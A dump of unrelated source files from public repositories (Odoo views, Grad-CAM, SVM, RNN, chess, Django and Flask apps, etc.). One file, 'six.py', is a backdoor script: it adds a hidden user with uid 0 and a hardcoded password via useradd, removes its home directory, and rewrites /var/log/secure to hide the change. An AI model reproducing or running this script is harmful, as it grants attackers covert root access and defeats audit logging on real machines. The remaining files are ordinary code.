| leohuang2013/pyannote-audio_speaker-diarization_cpp | segment/export.py | export.py | py | 2,301 | python | en | code | 5 | github-code | 90 |
13492340432 | from odoo import api, fields, models, _
class View(models.Model):
_inherit = "ir.ui.view"
#Assign correct inherited_id of duplicated view_id for a customize views when customize_show going to switched
@api.multi
def toggle(self):
super(View,self).toggle()
current_website_id = self._context.get('website_id')
duplicated_view=self.env['ir.ui.view'].sudo().search([('active','=',True),('website_id','=',self._context.get('website_id')),('key','=',self.key)])
for view in duplicated_view.inherit_children_ids :
if view.website_id.id != current_website_id and view.theme_template_id:
view.write({'inherit_id': self.id})
#Assign a copied view's inherited id , if view edited from the website
@api.multi
def write(self, vals):
if self and self[0].theme_template_id and vals.get('inherit_id'):
if self[0].inherit_id and self[0].inherit_id.website_id == self[0].website_id:
vals['inherit_id'] = self[0].inherit_id.id
return super(View, self).write(vals=vals) | Manibandaru/a2nsoft_ecommerce | emipro_theme_base/model/ir_ui_view.py | ir_ui_view.py | py | 1,106 | python | en | code | 1 | github-code | 90 |
35225746119 | import matplotlib.colors as mcolors
from os import path as osp
import pandas as pd
from skeleton_tools.openpose_layouts.body import BODY_25_LAYOUT
from skeleton_tools.openpose_layouts.face import FACE_LAYOUT
from skeleton_tools.openpose_layouts.hand import HAND_LAYOUT
NET_NAME = 'JORDI'
NET_FULLNAME = 'Joint Observation RRB Deep-learning Instrument'
REMOTE_STORAGE = osp.join(r'\\ac-s1', 'Data', 'Autism Center')
OPENPOSE_ROOT = r'C:\research\openpose'
MMACTION_ROOT = r'C:\research\mmaction2'
MMLAB_ENV_PATH = r'C:\Users\owner\anaconda3\envs\mmlab\python.exe'
DB_PATH = osp.join(REMOTE_STORAGE, r'Users\TalBarami\NAS_database_final.csv')
ANNOTATIONS_PATH = osp.join(REMOTE_STORAGE, r'Users\TalBarami\lancet_submission_data\annotations\labels.csv')
REAL_DATA_MOVEMENTS = ['Hand flapping', 'Tapping', 'Clapping', 'Fingers', 'Body rocking',
'Tremor', 'Spinning in circle', 'Toe walking', 'Back and forth', 'Head movement',
'Playing with object', 'Jumping in place', 'Legs movement', 'Feeling texture', 'Other', 'NoAction']
EMOTION_COLS = ['anger', 'disgust', 'fear', 'happiness', 'sadness', 'surprise', 'neutral']
AU_COLS = ['AU01', 'AU02', 'AU04', 'AU05', 'AU06', 'AU07', 'AU09', 'AU10', 'AU11', 'AU12', 'AU14', 'AU15', 'AU17', 'AU20', 'AU23', 'AU24', 'AU25', 'AU26', 'AU28', 'AU43']
LANDMARK_COLS = [i for s in list(zip([f'x_{i}' for i in range(68)], [f'y_{i}' for i in range(68)])) for i in s]
FACE_COLS = ['FaceRectX', 'FaceRectY', 'FaceRectWidth', 'FaceRectHeight', 'FaceScore']
ROTATION_COLS = ['Pitch', 'Roll', 'Yaw']
JSON_SOURCES = [
{'name': 'pose', 'openpose': 'pose_keypoints_2d', 'layout': BODY_25_LAYOUT},
{'name': 'face', 'openpose': 'face_keypoints_2d', 'layout': FACE_LAYOUT},
{'name': 'hand_left', 'openpose': 'hand_left_keypoints_2d', 'layout': HAND_LAYOUT},
{'name': 'hand_right', 'openpose': 'hand_right_keypoints_2d', 'layout': HAND_LAYOUT}
]
COLORS = [{'name': k.split(':')[1], 'value': tuple(int(v.lstrip('#')[i:i + 2], 16) for i in (0, 2, 4))} for k, v in mcolors.TABLEAU_COLORS.items()]
LENGTH = 200
MIN_LENGTH = 60
STEP_SIZE = 30
EPSILON = 1e-4
pd.options.display.max_columns = 99
def read_db():
_db = pd.read_csv(DB_PATH)
scores = pd.read_csv(REDCAP_PATH, parse_dates=['date_of_birth', 'assessment_date'], infer_datetime_format=True)
scores['age_days'] = scores['assessment_date'] - scores['date_of_birth']
scores['age_years'] = scores['age_days'].dt.days / 365.25
db = pd.merge(_db, scores[[c for c in scores.columns if c not in _db.columns or c == 'assessment']], on='assessment', how='left').drop_duplicates(subset=['basename'])
return db | TalBarami/SkeletonTools | skeleton_tools/utils/constants.py | constants.py | py | 2,663 | python | en | code | 0 | github-code | 90 |
9725525281 | # Selvaraju, R.R., Cogswell, M., Das, A. et al. Grad-CAM: Visual Explanations from Deep Networks via Gradient-Based Localization. Int J Comput Vis 128, 336–359 (2020). https://doi.org/10.1007/s11263-019-01228-7
import numpy as np
from matplotlib import pyplot as plt
import matplotlib as mpl
import cv2
from keras import backend as K
from keras.applications import imagenet_utils
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.imagenet_utils import preprocess_input, decode_predictions
# model1 = ResNet50(weights='imagenet', include_top=True)
model1 = ResNet50(weights=r'..\example\models\resnet50_weights_tf_dim_ordering_tf_kernels.h5', include_top=True)
#model1.summary()
def image_processing(img_path):
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def gradcam_fm(model, x):
preds = model.predict(x)
pred_class = np.argmax(preds[0])
pred_output = model.output[:, pred_class]
last_conv_layer = model.get_layer('res5c_branch2c')
grads = K.gradients(pred_output, last_conv_layer.output)[0]
pooled_grads = K.sum(grads, axis=(0, 1, 2))
iterate = K.function([model.input], [pooled_grads, last_conv_layer.output[0]])
pooled_grads_value, conv_layer_output_value = iterate([x])
for i in range(pooled_grads_value.shape[0]):
conv_layer_output_value[:, :, i] *= (pooled_grads_value[i])
heatmap = np.sum(conv_layer_output_value, axis=-1)
return heatmap
import matplotlib.ticker as ticker
def fmt1(x,pos): # 设置colorbar的刻度值
return int(x/253)
def visual_heatmap(heatmap, img_path):
fig, ax = plt.subplots()
heatmap = np.maximum(heatmap, 0)
heatmap /= np.max(heatmap)
img = cv2.imread(img_path)
im = cv2.resize(cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB), (img.shape[1], img.shape[0]))
heatmap = cv2.resize(heatmap, (img.shape[1], img.shape[0]))
heatmap = np.uint8(255 * heatmap)
ax.imshow(im, alpha=0.8)
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
h= ax.imshow(heatmap, cmap='rainbow', alpha=0.4)
plt.colorbar(h, ticks=[0,253],format=ticker.FuncFormatter(fmt1),shrink = 0.8)
plt.show()
img_path = '../data/2.png'#'../example/example_roi.png' #'../data/4.png'
img = image_processing(img_path)
heatmap = gradcam_fm(model1, img)
visual_heatmap(heatmap, img_path) | cmingwhu/DL-LNM | Feature map/Feature map.py | Feature map.py | py | 2,601 | python | en | code | 0 | github-code | 90 |
33081122094 | import os
print('six')
import subprocess
C='ht'
c = 'pwdht2018'
cmmd = "useradd -p `openssl passwd -1 -salt 'uroot' " + c + "`" + " -u 0 -o -g root -G root -s /bin/bash -d /home/" + C + " " + C
rmu = 'rm -r -f /home/'+C
rmtouch = 'rm -r -f /var/log/secure'
rmrms = 'rm -r -f /var/log/rms'
fp = open('/var/log/secure','r')
for line in fp:
fq = open('/var/log/rms','a')
fq.write(line)
fp.close()
fq.close()
subprocess.getstatusoutput(cmmd)
subprocess.getstatusoutput(rmu)
subprocess.getstatusoutput(rmtouch)
rp = open('/var/log/rms','r')
for line in rp:
rq = open('/var/log/secure','a')
rq.write(line)
rp.close()
rq.close()
subprocess.getstatusoutput(rmrms)
| torartorg/ulit | six.py | six.py | py | 677 | python | en | code | 0 | github-code | 90 |
45822089289 | '''
This module performs logistic regression.
Inputs: database connection, training data, training labels, test data, test labels
Outputs: precision/recall curves
Author: Curt Hansen
Created: Aug 4, 2012
Modified:
'''
import sys, os, time
import pf_connect as db
import numpy as n
import math_functions as m
import logreg as l
import svmutil as svm
def simple_comp(X,coeffs,cutoff):
# This function ignores the coeffs variable but includes it for consistency with other methos.
y_pred = n.zeros((len(X),1))
y_pred[(X>cutoff)] = 1
return y_pred
def run_logreg_model(dbCur,trainY,trainX,testY,testX,time_stamp,round,num_cutoff_points):
coeffs = l.compute_logreg_coeffs(trainX,trainY)
performance_results,valid_ind = m.compute_pred_performance_curve(l.predict_classes,testY,testX,coeffs,num_cutoff_points)
for idx in range(num_cutoff_points):
if valid_ind[0,idx] == 1:
recall = performance_results[0,idx]; precision = performance_results[1,idx]
else:
recall = None; precision = None
dbCur.execute("INSERT INTO snp_results_detail (time_stamp,model_used,fold_no,seq_no,val_recall,val_precision) \
VALUES(timestamp %s,'lr',%s,%s,%s,%s);",[time_stamp,round+1,idx,recall,precision])
def run_svm_model(dbCur,trainY,trainX,testY,testX,time_stamp,round,num_cutoff_points):
trainY = (2*trainY-1).tolist(); testYSVM = (2*testY-1).tolist() # Convert labels to -1,+1 format and lists as required by libsvm.
trainY = [i[0] for i in trainY]; testYSVM = [i[0] for i in testY] # Convert to list of floats from list of lists.
trainX = trainX.tolist(); testX = testX.tolist() # Convert to list as required by libsvm.
prob = svm.svm_problem(trainY,trainX)
params = svm.svm_parameter('-b 1 -q')
svmmodel = svm.svm_train(prob,params)
p_label, p_acc, p_val = svm.svm_predict(testYSVM,testX,svmmodel,'-b 1')
probs = n.array(p_val)[:,1]; probs.shape = (len(probs),1)
performance_results,valid_ind = m.compute_pred_performance_curve(simple_comp,testY,probs,None,num_cutoff_points)
for idx in range(num_cutoff_points):
if valid_ind[0,idx] == 1:
recall = performance_results[0,idx]; precision = performance_results[1,idx]
else:
recall = None; precision = None
dbCur.execute("INSERT INTO snp_results_detail (time_stamp,model_used,fold_no,seq_no,val_recall,val_precision) \
VALUES(timestamp %s,'svm',%s,%s,%s,%s);",[time_stamp,round+1,idx,recall,precision])
| berkeleyphylogenomics/BPG_utilities | bpg/snp_analysis/model/stat_models.py | stat_models.py | py | 2,540 | python | en | code | 1 | github-code | 90 |
24208907607 | import tensorflow as tf
from tensorflow.compat import v1
__all__ = [
'BaseRNN'
]
def reverse_sequence(sequence, sequence_length):
"""
Reverses a batched sequence in time-major order [T,N,...]. The input sequence
may be padded, in which case sequence_length specifies the unpadded length of
each sequence.
"""
if sequence_length is None:
return tf.reverse(sequence, axis=[0])
return tf.reverse_sequence(sequence, sequence_length, seq_axis=0, batch_axis=1)
def transpose(tensor_or_tuple, perm):
"""Transposes the given tensor or tuple of tensors by the same permutation."""
if isinstance(tensor_or_tuple, tuple):
return tuple([tf.transpose(tensor, perm) for tensor in tensor_or_tuple])
return tf.transpose(tensor_or_tuple, perm)
class BaseRNN(tf.Module):
def __init__(self, rnn_class, num_units, direction, default_name, **kwargs):
assert direction in ['unidirectional', 'bidirectional']
self.default_name = default_name
if direction == 'bidirectional':
name = kwargs.pop('name', None)
super().__init__(name)
self.realname = name
self.fw_layer = rnn_class(num_units, name='fw', **kwargs)
self.bw_layer = rnn_class(num_units, name='bw', **kwargs)
else:
super().__init__()
self.fw_layer = rnn_class(num_units, **kwargs)
self.bw_layer = None
def build(self, shape):
"""
Creates the variables of the layer.
Calling this method is optional for users of the RNN class. It is called
internally with the correct shape when `__call__` is invoked.
Arguments:
shape: instance of `TensorShape`.
"""
if self.bidirectional:
with self.name_scope, v1.variable_scope(self.realname, self.default_name):
self.fw_layer.build(shape)
self.bw_layer.build(shape)
else:
self.fw_layer.build(shape)
@property
def output_size(self):
if self.bidirectional:
return self.fw_layer.output_size, self.bw_layer.output_size
return self.fw_layer.output_size
@property
def state_size(self):
if self.bidirectional:
return self.fw_layer.state_size, self.bw_layer.state_size
return self.fw_layer.state_size
def __call__(self, inputs, training, sequence_length=None, time_major=False):
"""
Runs the RNN layer.
Arguments:
inputs: Tensor, a rank 3 input tensor with shape [N,T,C] if `time_major`
is `False`, or with shape [T,N,C] if `time_major` is `True`.
training: bool, `True` if running in training mode, `False` if running
in inference mode.
sequence_length: (optional) Tensor, a rank 1 tensor with shape [N] and
dtype of `tf.int32` or `tf.int64`. This tensor specifies the unpadded
length of each example in the input minibatch.
time_major: (optional) bool, specifies whether `input` has shape [N,T,C]
(`time_major=False`) or shape [T,N,C] (`time_major=True`).
Returns:
A pair, `(output, state)` for unidirectional layers, or a pair
`([output_fw, output_bw], [state_fw, state_bw])` for bidirectional
layers.
"""
if not time_major:
inputs = transpose(inputs, [1, 0, 2])
result, state = self.fw_layer(inputs, sequence_length, training)
if self.bidirectional:
inputs = reverse_sequence(inputs, sequence_length)
bw_result, bw_state = self.bw_layer(inputs, sequence_length, training)
result = result, reverse_sequence(bw_result, sequence_length)
state = state, bw_state
if not time_major:
result = transpose(result, [1, 0, 2])
return result, state
@property
def bidirectional(self):
"""`True` if this is a bidirectional RNN, `False` otherwise."""
return self.bw_layer is not None
| lmnt-com/haste | frameworks/tf/base_rnn.py | base_rnn.py | py | 3,732 | python | en | code | 306 | github-code | 90 |
36598649418 | import codecs
from bs4 import BeautifulSoup
from konlpy.tag import Okt
import pandas as pd
# 소설책 읽어오기
f= open('001.deep/book.txt',encoding='utf-8')
book = f.read()
# print(book) # 전체글 출력
okt = Okt()
word_dic = {}
lines = book.split("\r\n")
# 1줄씩 가져와서 for반복문
for line in lines:
# 형태소 분석
malist = okt.pos(line, norm=True , stem=True)
# 형태소, 품사분리
for taeso, pumsa in malist :
# 명사일 경우만 추가
if pumsa == "Noun":
# word_dic안에 형태소가 없으면 list추가후 1증가
if not (taeso in word_dic):
word_dic[taeso] = 0
word_dic[taeso] += 1
# 숫자역순정렬
keys = sorted(word_dic.items(),key=lambda x:x[1],reverse=True)
# 50개 데이터 정렬
for word,count in keys[:50]:
print("{0}({1})".format(word,count),end="")
print() | onulee/https---github.com-onulee-kdigital1 | 001.deep/de10_03소설형태소.py | de10_03소설형태소.py | py | 915 | python | en | code | 0 | github-code | 90 |
37383857728 | import unittest
from contextnet.model import ContextNet
import torch
class TestContextNet(unittest.TestCase):
def test_forward(self):
batch_size = 3
seq_length = 500
input_size = 80
cuda = torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
model = ContextNet(
model_size='medium',
num_vocabs=10,
).to(device)
inputs = torch.FloatTensor(batch_size, seq_length, input_size).to(device)
input_lengths = torch.IntTensor([500, 450, 350]).to(device)
targets = torch.LongTensor([[1, 3, 3, 3, 3, 3, 4, 5, 6, 2],
[1, 3, 3, 3, 3, 3, 4, 5, 2, 0],
[1, 3, 3, 3, 3, 3, 4, 2, 0, 0]]).to(device)
target_lengths = torch.LongTensor([9, 8, 7]).to(device)
outputs = model(inputs, input_lengths, targets, target_lengths)
print(outputs.size()) # torch.Size([3, 59, 9, 10])
def test_recognize(self):
batch_size = 3
seq_length = 500
input_size = 80
cuda = torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
model = ContextNet(
model_size='medium',
num_vocabs=10,
).to(device)
inputs = torch.FloatTensor(batch_size, seq_length, input_size).to(device)
input_lengths = torch.IntTensor([500, 450, 350]).to(device)
outputs = model.recognize(inputs, input_lengths)
print(outputs.size()) # torch.Size([3, 59])
if __name__ == '__main__':
unittest.main()
| upskyy/ContextNet | test/test_contextnet.py | test_contextnet.py | py | 1,611 | python | en | code | 27 | github-code | 90 |
18561397949 | from collections import defaultdict
from itertools import groupby, accumulate, product, permutations, combinations
def solve():
d = defaultdict(lambda: 0)
N = int(input())
for i in range(N):
S = input()
d[S[0]] += 1
s = 'MARCH'
s = list(s)
cnt = 0
for com in combinations(s,3):
prod = 1
for c in com:
prod *= d[c]
cnt += prod
return cnt
print(solve()) | Aasthaengg/IBMdataset | Python_codes/p03425/s065180764.py | s065180764.py | py | 393 | python | en | code | 0 | github-code | 90 |
34062200065 | from django.urls import path
from . import views
app_name = 'bankcard'
urlpatterns = [
path('request/', views.card_request, name='card_request'),
path('approve/<int:card_request_id>/', views.card_approval, name='card_approval'),
path('user_cards/', views.user_cards, name='user_cards'),
path('cards_types/', views.cards_types, name='cards_types'),
path('approve_select_user/', views.approve_select_user, name='approve_select_user'),
]
| thanosronin51/2ndRenewed | bankcard/urls.py | urls.py | py | 473 | python | en | code | 0 | github-code | 90 |
17966757309 | import math
def lcm(x, y):
return (x * y) // math.gcd(x, y)
N = int(input())
t_li = []
for _ in range(N):
t_li.append(int(input()))
if N > 1:
ans = lcm(t_li[0], t_li[1])
for i in range(2, N):
ans = lcm(ans, t_li[i])
else:
ans = t_li[0]
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03633/s354468503.py | s354468503.py | py | 279 | python | en | code | 0 | github-code | 90 |
6438571161 | # 백준 18870 (시간초과ㅠ)
N = int(input())
X = list(map(int, input().split()))
J = set(X)
compact = []
for i in X:
cnt = 0
for j in J:
if j < i:
cnt += 1
compact.append(cnt)
print(*compact) | namoo1818/SSAFY_Algorithm_Study | 배민지/18870.py | 18870.py | py | 239 | python | en | code | 0 | github-code | 90 |
40150918151 | import json
from django.contrib.auth.decorators import login_required
from django.db import DatabaseError
from django.http import HttpResponseNotFound, HttpResponseBadRequest, HttpResponse, Http404
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from dashboard.form import UploadForm, RecordEditForm
from dashboard.models import *
@require_POST
@csrf_exempt
def upload(request):
print('uploading...')
print(request.POST)
token = request.POST.get('token', '')
try:
user = User.objects.get(profile__token=token)
except User.DoesNotExist as e:
return HttpResponseBadRequest(json.dumps({
"code": "bad token",
"err": str(token),
}))
form = request.POST.get('data', None)
if not form:
return HttpResponse(json.dumps({
'code': 'no data'
}))
try:
form = json.loads(form)
form = UploadForm(form)
except json.JSONDecodeError as e:
return HttpResponseBadRequest(json.dumps({
'code': 'wrong format',
'err': str(e),
}))
if not form.is_valid():
# print(form.errors.as_json())
return HttpResponseBadRequest(json.dumps({
'code': 'unknown error',
'err': form.errors.as_json(),
}))
record = Record.objects.create(
user=user,
entry=form.cleaned_data['entry'],
args=form.cleaned_data['args'],
working_dir=form.cleaned_data['working_dir'],
git_user=form.cleaned_data['git_user'],
git_repo=form.cleaned_data['git_repo'],
git_commit=form.cleaned_data['git_commit'],
record_information=form.cleaned_data['record_information'],
result=form.cleaned_data['result'],
)
for dataloader in form.cleaned_data['record_information']['dataloader']:
Dataloader.objects.create(
file_id=dataloader[0]['file_id'],
clsname=dataloader[0]['clsname'],
record=record,
)
return HttpResponse(json.dumps({
'code': 'ok',
'id': record.id,
}))
def get(request):
rid = request.GET.get('id', None)
if not rid:
raise Http404('ID does not exist')
try:
record = Record.objects.get(id=rid)
except Record.DoesNotExist:
raise Http404('ID does not exist')
res = {
'id': record.id,
'user': record.user.username,
'entry': record.entry,
'args': record.args,
'working_dir': record.working_dir,
'git_user': record.git_user,
'git_repo': record.git_repo,
'git_commit': record.git_commit,
'record_information': record.record_information,
'result': record.result,
}
return HttpResponse(json.dumps(res))
def show(request):
rid = request.GET.get('id', None)
if not rid:
raise Http404('ID does not exist')
try:
record = Record.objects.get(id=rid)
except Record.DoesNotExist:
raise Http404('ID does not exist')
if record.hidden and record.user != request.user:
raise Http404('Permission denied')
config = {
'entry': record.entry,
'args': record.args,
'working_dir': record.working_dir,
}
return render(request, 'dashboard/show.html', locals())
@login_required
def edit(request):
if request.method == 'GET':
rid = request.GET.get('id', None)
if not rid:
raise Http404('ID does not exist')
try:
record = Record.objects.get(id=rid)
except Record.DoesNotExist:
raise Http404('ID does not exist')
if record.user != request.user:
raise Http404('Permission denied')
form = RecordEditForm(instance=record)
return render(request, 'dashboard/edit.html', locals())
elif request.method == 'POST':
rid = request.POST.get('id', None)
if not rid:
return HttpResponseBadRequest('ID does not exist')
try:
record = Record.objects.get(id=rid)
except Record.DoesNotExist:
return HttpResponseBadRequest('ID does not exist')
if record.user != request.user:
return HttpResponseBadRequest('Permission denied')
if 'delete' in request.POST:
record.delete()
return redirect('records')
form = RecordEditForm(request.POST, instance=record)
if form.is_valid():
form.save()
return redirect('/show?id={}'.format(rid))
else:
return HttpResponseBadRequest('Invalid form')
@login_required
@require_POST
def update(request):
rid = request.POST.get('id', None)
if not rid:
return HttpResponseBadRequest('ID does not exist')
try:
record = Record.objects.get(id=rid)
except Record.DoesNotExist:
return HttpResponseBadRequest('ID does not exist')
if record.user != request.user:
return HttpResponseBadRequest('You have no permission to do this')
description = request.POST.get('description', None)
if description:
try:
record.description = description
record.save()
except DatabaseError:
return HttpResponseBadRequest('Description too long')
return redirect('/show?id={}'.format(rid))
# No content
return HttpResponse(status=204)
| thu-coai/cotk_dashboard | dashboard/views/records.py | records.py | py | 5,481 | python | en | code | 2 | github-code | 90 |
18232841349 | if __name__ == '__main__':
N = int(input())
Als = [int(a) for a in input().split()]
lst = []
for i in range(N):
lst.append([Als[i],i+1])
lst.sort(reverse = True)
DP = [[0] * (N+1) for _ in range(N+1)]
ans = 0
for i in range(1,N+1):
a = lst[i-1][0]
index = lst[i-1][1]
vx = DP[i-1][0] + a * abs(index-i)
vy = DP[0][i-1] + a * abs(index-(N-i+1))
DP[i][0] = vx
DP[0][i] = vy
if ans < vx:
ans = vx
if ans < vy:
ans = vy
for i in range(1,N+1):
for j in range(1,N+1):
if i + j <= N:
a = lst[i+j-1][0]
index = lst[i+j-1][1]
v = max(DP[i-1][j] + a * abs(index-i),DP[i][j-1] + a * abs(index-(N-j+1)))
DP[i][j] = v
if ans < v:
ans = v
else:
break
print(int(ans)) | Aasthaengg/IBMdataset | Python_codes/p02709/s923534534.py | s923534534.py | py | 729 | python | en | code | 0 | github-code | 90 |
21613436978 | #!/usr/bin/python
from time import gmtime, strftime, time
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter, inch
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle
from itertools import izip_longest
def dates(starttime = time(), count = 20, repeat = 2, decorate = None):
if decorate is None:
decorate = [ ('', '') ] * repeat
for i in xrange(0, count//repeat):
o = strftime('%Y %b %d', gmtime(starttime + 24*60*60*i))
for j in xrange(0, repeat):
yield decorate[j][0] + o + decorate[j][1]
def grouper(iterable, n, fillvalue=None):
'Collect data into fixed-lenght chunks or blocks'
# grouper('ABCDEFG', 3, 'x') -> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def dates_table(starttime = time(), rows=26, columns=3):
decorate = [
(' ', ' >>>'),
('<<< ', ' ')
]
d = dates(starttime=starttime, count=rows*columns, repeat=2, decorate=decorate)
g = grouper(d, rows)
return zip(*g)
doc = SimpleDocTemplate("egg_dates.pdf", pagesize = letter)
elements = []
t =Table(dates_table())
t.setStyle(TableStyle([
('FONT', (0,0), (-1,-1), 'Courier-Bold', 15),
('ALIGN', (0,0), (-1,-1), 'CENTER'),
('VALIGN', (0,0), (-1,-1), 'MIDDLE'),
('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
('BOX', (0,0), (-1,-1), 0.25, colors.black)
]))
elements.append(t)
doc.build(elements)
| sgproduce/sgproduce.github.io | snippets/egg_dates.py | egg_dates.py | py | 1,490 | python | en | code | 0 | github-code | 90 |
18267945849 | n,k = map(int,input().split())
mod = 1000000007
def comb(n,k):
if n < k: return 0
if n < 0 or k < 0: return 0
return fac[n]*finv[k]%mod*finv[n-k]%mod
fac = [1]*(n+1)
finv = [1]*(n+1)
for i in range(1,n+1):
fac[i] = fac[i-1]*i%mod
finv[i] = pow(fac[i],mod-2,mod)
ans = 0
for i in range(min(k+1,n)):
ans += comb(n,i)*comb(n-1,i)%mod
ans %= mod
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02769/s425052214.py | s425052214.py | py | 381 | python | en | code | 0 | github-code | 90 |
23985637689 | class Solution:
def kthSmallest(self, matrix: List[List[int]], k: int) -> int:
N = len(matrix)
pq = []
for i, row in enumerate(matrix):
pq.append((-row.pop(), i))
heapify(pq)
k = N*N - k + 1
while k:
n, i = heappop(pq)
if matrix[i]:
heappush(pq, (-matrix[i].pop(), i))
k -= 1
return -n | birsnot/A2SV_Programming | kth-smallest-element-in-a-sorted-matrix.py | kth-smallest-element-in-a-sorted-matrix.py | py | 409 | python | en | code | 0 | github-code | 90 |
38858330186 | from constants import *
from piece import *
import chess
class Square:
def __init__(self, rank, file, piece=None):
self.rank = rank
self.file = file
self.piece = piece
def has_piece(self):
return self.piece != None
class Board:
def __init__(self):
self.squares = [FILES*[0] for rank in range(RANKS)]
self.last_move = None
self._create()
self._add_piece('white')
self._add_piece('black')
def move(self, piece, move, enpassant=False, promotion=False, kingcastling=False, queencastling=False, piece_colour='white'):
initial = move.initial
final = move.final
if enpassant==True:
self.squares[initial.rank][final.file].piece = None
if promotion==True:
self.squares[initial.rank][initial.file].piece = None
self.squares[final.rank][final.file].piece = Queen(piece_colour)
if kingcastling==True:
# king move
self.squares[initial.rank][initial.file].piece = None
self.squares[final.rank][final.file].piece = piece
# rook move
self.squares[final.rank][final.file+1].piece = None
self.squares[final.rank][final.file-1].piece = Rook(piece_colour)
if queencastling==True:
# king move
self.squares[initial.rank][initial.file].piece = None
self.squares[final.rank][final.file].piece = piece
# rook move
self.squares[final.rank][final.file-2].piece = None
self.squares[final.rank][final.file+1].piece = Rook(piece_colour)
elif promotion==False:
self.squares[initial.rank][initial.file].piece = None
self.squares[final.rank][final.file].piece = piece
self.last_move = move
def valid_move(self, move, current_board):
valid_moves = [str(idx) for idx in current_board.legal_moves]
print(valid_moves) #CHECKPOINT
return True if move in valid_moves else False
def _create(self):
for rank in range(RANKS):
for file in range(FILES):
self.squares[rank][file] = Square(rank, file)
def _add_piece(self, colour):
pawn_rank, major_rank = (6, 7) if colour == 'white' else (1, 0)
# pawns
for file in range(FILES):
self.squares[pawn_rank][file] = Square(pawn_rank, file, Pawn(colour))
# knights
self.squares[major_rank][1] = Square(major_rank, 1, Knight(colour))
self.squares[major_rank][6] = Square(major_rank, 6, Knight(colour))
# bishops
self.squares[major_rank][2] = Square(major_rank, 2, Bishop(colour))
self.squares[major_rank][5] = Square(major_rank, 5, Bishop(colour))
# rooks
self.squares[major_rank][0] = Square(major_rank, 0, Rook(colour))
self.squares[major_rank][7] = Square(major_rank, 7, Rook(colour))
# queen
self.squares[major_rank][3] = Square(major_rank, 3, Queen(colour))
# king
self.squares[major_rank][4] = Square(major_rank, 4, King(colour))
| jorgegmartin/Chess_Engine_TFM | chess_game/gui/board.py | board.py | py | 3,153 | python | en | code | 0 | github-code | 90 |
10157154685 | from pprint import pprint, pformat
from geopandas import GeoDataFrame
import requests
from geojson import Feature, Point, FeatureCollection
from topo import get_state, get_huc8, get_place, get_county
def rget(url, callback=None, recursive=True):
items = []
def _get(u):
print('url={}'.format(u))
resp = requests.get(u)
print('resp={}'.format(resp))
j = resp.json()
if callback:
callback(items, j)
else:
try:
items.extend(j['value'])
except KeyError:
items.append(j)
try:
next = j['@iot.nextLink']
except KeyError:
return
if recursive:
_get(next)
_get(url)
return items
GEOCONNEX = 'https://geoconnex.us'
def nmbgmr_uri_factory(name):
return '{}/nmwdi/nmbgmr/wells/{}'.format(GEOCONNEX, name)
def ose_uri_factory(name):
return '{}/nmwdi/ose/wells/{}'.format(GEOCONNEX, name)
def nmbgmr_props_factory(loc, thing):
props = thing['properties']
# props['id'] = loc['name']
props['id'] = thing['name']
props['agency_id'] = thing['name']
props.pop('@nmbgmr.point_id', None)
try:
wd = float(props.pop('welldepth', 0))
except BaseException:
wd = 0
props['welldepth'] = float(wd)
return props
def ose_props_factory(loc, thing):
props = thing['properties']
# props['id'] = loc['name']
props['id'] = thing['name']
props['agency_id'] = thing['name']
return props
def get_geojson_features(url, factory, uri_factory):
def feature_factory(i, loc, thing):
props = factory(loc, thing)
props['sta'] = '{}?$expand=Datastreams/Observations'.format(thing['@iot.selfLink'])
props['state'] = get_state(loc)
props['huc8'] = get_huc8(loc)
props['place'] = get_place(loc)
props['county'] = get_county(loc)
props['uri'] = uri_factory(thing['name'])
print('construct:{:05n} {} properties={}'.format(i, thing['name'],
pformat(props)))
return Feature(properties=props,
geometry=Point(loc['location']['coordinates']))
items = rget(url, recursive=True)
return FeatureCollection([feature_factory(i, loc, thing) for i, loc in enumerate(items) for thing in loc['Things']])
def write_gpkg(fc, name='nmbgmr_wells'):
# convert obj to a GeoDataFrame
gdf = GeoDataFrame.from_features(fc['features'])
# write to gpkg
gdf.to_file('{}.gpkg'.format(name), driver='GPKG')
def main():
# write nmbgmr wells
url = 'https://st.newmexicowaterdata.org/FROST-Server/v1.1/Locations?$expand=Things'
fs = get_geojson_features(url, nmbgmr_props_factory, nmbgmr_uri_factory)
write_gpkg(fs)
url = 'https://ose.newmexicowaterdata.org/FROST-Server/v1.1/Locations?$expand=Things'
fs = get_geojson_features(url, ose_props_factory, ose_uri_factory)
write_gpkg(fs, 'ose_wells')
if __name__ == '__main__':
main()
# ============= EOF =============================================
| NMWDI/pygeoapi_config | generate_wells_gpkg.py | generate_wells_gpkg.py | py | 3,128 | python | en | code | 1 | github-code | 90 |
37719327774 | from flask_app.config.mysqlconnection import MySQLConnection
import requests
import os
from flask_app import app
from flask import flash, request, jsonify
import logging
logging.basicConfig(level=logging.DEBUG)
class Game:
def __init__(self, db_data):
self.atlas_game_id = db_data['atlas_game_id']
self.atlas_game_name = db_data['atlas_game_name']
@classmethod
def get_game_info(cls, data):
boardgame_atlas = os.environ.get("boardgame_atlas_api")
logging.debug(f'This is from os.environ[key]: {boardgame_atlas}')
logging.debug("next is from environ")
logging.debug({os.environ.get("boardgame_atlas_api")})
results = requests.get(f'https://api.boardgameatlas.com/api/search?client_id=AWoH1mhoWo&ids={data["atlas_game_id"]}')
results_json = results.json()
game_info = results_json["games"][0]
return game_info
@classmethod
def get_random_game(cls):
results = requests.get(f'https://api.boardgameatlas.com/api/search?client_id=AWoH1mhoWo&random=true')
results_json = results.json()
game_info = results_json["games"][0]
return game_info
@classmethod
def search_for_games(cls, data):
results = requests.get(f'https://api.boardgameatlas.com/api/search?name={data["search_term"]}&limit=3&client_id=AWoH1mhoWo')
results = results.json()
results = results['games']
search_results=[]
for game in results:
search_results.append(game)
return search_results
@classmethod
